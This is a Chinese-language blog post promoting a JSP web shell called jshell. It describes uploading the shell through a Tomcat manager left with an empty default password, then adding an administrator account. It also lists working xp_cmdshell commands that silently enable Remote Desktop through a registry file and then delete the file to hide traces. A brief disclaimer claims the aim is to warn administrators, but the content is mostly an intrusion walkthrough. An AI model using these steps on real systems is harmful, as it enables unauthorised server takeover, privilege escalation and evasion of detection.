強大的jshell
阿新 • • 發佈:2019-01-10
一款不錯的jsp木馬,jshell最近發現修改版很多,而且功能也強大了好多。
首先介紹一下如何上載這款jsp木馬,現在的jsp應用大多以tomcat釋出,tomcat預設有兩個管理應用,分別是admin和manager/html,如果在軟體釋出的時候沒有更改密碼或刪除應用,就會造成很大的安全隱患,例如這兩個應用的預設密碼都為空,登入manager後,可以建立上傳context應用,如果我們把這款jsp上傳的話,基本上整個系統都在我們的掌控之下。
可以執行系統命令,這時可以隨便新增一個使用者到系統中,然後把該使用者新增到administrators使用者組中,拿到超級許可權,這時可以看看是否開通了3389埠,沒開的話可以
//拿到sqlserver管理員密碼時 “>”表示覆蓋寫入,“>>”表示追加寫入 exec master.dbo.xp_cmdshell 'echo Windows Registry Editor Version 5.00 >3389.reg' exec master.dbo.xp_cmdshell 'echo. >>3389.reg' exec master.dbo.xp_cmdshell 'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg' exec master.dbo.xp_cmdshell 'echo "fDenyTSConnections"=dword:00000000 >>3389.reg' exec master.dbo.xp_cmdshell 'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg' exec master.dbo.xp_cmdshell 'echo "PortNumber"=dword:00000d3d >>3389.reg' exec master.dbo.xp_cmdshell 'echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg' exec master.dbo.xp_cmdshell 'echo "PortNumber"=dword:00000d3d >>3389.reg' //執行註冊檔案 exec master.dbo.xp_cmdshell 'regedit /s 3389.reg' //毀屍滅跡 exec master.dbo.xp_cmdshell 'del 3389.reg'
遠端登入進去,呵呵,“為所欲為”
本篇只為交流,希望能引起管理員的重視,減少軟體的安全隱患。特別是在軟體不存在sql注入的情況下,往往令人費解,他是怎麼突入進來了,通過tomcat這種漏洞或者算是管理員的疏忽,往往比sql注入更容易突破進來,而且危害也遠遠大於sql注入。